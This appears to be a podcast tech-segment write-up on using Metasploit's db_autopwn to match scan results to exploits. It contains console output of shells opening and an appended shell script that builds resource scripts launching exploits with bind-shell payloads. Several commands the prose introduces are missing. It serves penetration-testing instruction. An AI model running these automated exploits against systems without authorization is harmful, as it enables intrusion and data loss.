From PaulDotCom episode 124:
Tech Segment: Automating Exploitation With Metasploit's db_autopwn
There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in or the inside looking out. I like to automate this process as far as I can, then use manual methods to verify the results. For example, let's say I want to quickly check the results of an Nmap or Nessus scan and see whether any of the Windows hosts are vulnerable to common Microsoft exploits. Metasploit's db_autopwn can do this: it matches the exploit modules in the framework against the hosts and services recorded in its database and launches the matching exploits for me.
The first step is to load a database plugin in Metasploit and create a database:
From here I have several options. I can import the results of a previous Nmap scan, provided it was saved as XML (-oX):
Alternatively, the db_nmap command runs Nmap from within Metasploit and populates the database directly:
I can now launch exploits against the known targets, but the only selection criterion available is open port, since an Nmap scan records ports and services but says nothing about which vulnerabilities are actually present:
-p tells db_autopwn to select exploit modules by matching each module's default port against the open ports of each host, and -e tells it to actually launch them rather than just list the matches. With port matching alone, I give Metasploit a lot of work to do:
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
[*] Started bind handler
727 possible exploit vectors! That took a while, and most of those attempts go against services that were never vulnerable, because an open port says nothing about the patch level behind it. So I ran Nessus against my network instead and imported the Nessus results:
Now I run db_autopwn again and tell it to select modules by vulnerability reference, matching the CVE and BID identifiers in each Nessus finding against the references carried by each exploit module:
This launches far fewer exploits, only those whose references match a finding Nessus actually reported on that host, and produces much better results:
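The two runs described above, as an added example that is not code from the segment or from the Metasploit project. It assumes a Metasploit 3.x-era msfconsole in which the db_sqlite3 plugin and the db_create, db_import_nmap_xml, db_nmap, db_import_nessus_nbe and db_autopwn commands exist (db_autopwn was later removed from the framework), and the database path, plugin ids and Nessus NBE lines are constructed for illustration. The first function writes a resource script for either selection mode; the second pulls the CVE references out of NBE findings, which is what -x keys on and why it launches so much less than -p:

```shell
#!/bin/sh
# Added example for this segment, not code from the show or the Metasploit project.
# Assumptions: a Metasploit 3.x-era msfconsole (db_sqlite3 plugin, db_create,
# db_import_nmap_xml, db_nmap, db_import_nessus_nbe, db_autopwn); db_autopwn was
# later removed from the framework. The database path, plugin ids and the NBE
# lines below are constructed for illustration.

# Build an msfconsole resource script (run with: msfconsole -r <file>) for one
# of the two selection modes the segment walks through.
# usage: write_autopwn_rc ports|vulns <nmap.xml or nessus.nbe> <out.rc>
write_autopwn_rc() {
  mode=$1; input=$2; rc=$3
  {
    echo "load db_sqlite3"
    echo "db_create /tmp/pdc124.db"          # hypothetical database path
    case $mode in
      ports)
        echo "db_import_nmap_xml $input"     # Nmap results saved with -oX
        echo "db_autopwn -t -p"              # -t: list the matches first, launch nothing
        echo "db_autopwn -p -e -b"           # -p by open port, -e launch, -b bind-shell payloads
        ;;
      vulns)
        echo "db_import_nessus_nbe $input"   # Nessus results saved as NBE
        echo "db_autopwn -t -x"
        echo "db_autopwn -x -e -b"           # -x by vulnerability reference
        ;;
      *)
        echo "usage: write_autopwn_rc ports|vulns input out.rc" >&2
        return 1
        ;;
    esac
    echo "sessions -l"                       # show whatever shells came back
  } > "$rc"
}

# Constructed Nessus NBE lines (fields: results|subnet|host|port|plugin id|type|text).
# The CVE ids are the real ones for MS08-067 and the IIS .printer overflow; the
# plugin ids are placeholders.
write_sample_nbe() {
  cat > "$1" <<'EOF'
results|192.168.1|192.168.1.52|smb (445/tcp)|00001|Security Hole|Server service overflow\nCVE : CVE-2008-4250\n
results|192.168.1|192.168.1.52|www (80/tcp)|00002|Security Note|A web server is running on this port.\n
results|192.168.1|192.168.1.226|www (80/tcp)|00003|Security Hole|IIS .printer ISAPI overflow\nCVE : CVE-2001-0241\n
EOF
}

# Print "host CVE" pairs for Security Hole / Security Warning findings only.
# This is what -x keys on: a module launches only where one of its references
# matches a finding on that host, not everywhere its default port is open.
nbe_refs() {
  awk -F'|' '$1 == "results" && $6 != "Security Note" { print $3 "|" $7 }' "$1" |
  while IFS='|' read -r host text; do
    printf '%s\n' "$text" | grep -oE 'CVE-[0-9]{4}-[0-9]+' | sed "s/^/$host /"
  done | sort -u
}

# Stand-alone demo.
write_sample_nbe /tmp/pdc124_sample.nbe
write_autopwn_rc vulns /tmp/pdc124_sample.nbe /tmp/pdc124_vulns.rc
echo "== resource script =="; cat /tmp/pdc124_vulns.rc
echo "== references -x will match on =="; nbe_refs /tmp/pdc124_sample.nbe
```

Run the resource script with `msfconsole -r /tmp/pdc124_vulns.rc`. The `-t` line is the check worth keeping: it prints exactly which modules would be launched against which hosts without firing anything, so you can see the 727-entry list before committing to it. Note that `-x` can only be as good as the scan feeding it: a finding without a CVE or BID reference, or a Nessus plugin that was not run, never becomes a match, so a short list from `-x` means "nothing matched", not "nothing is vulnerable".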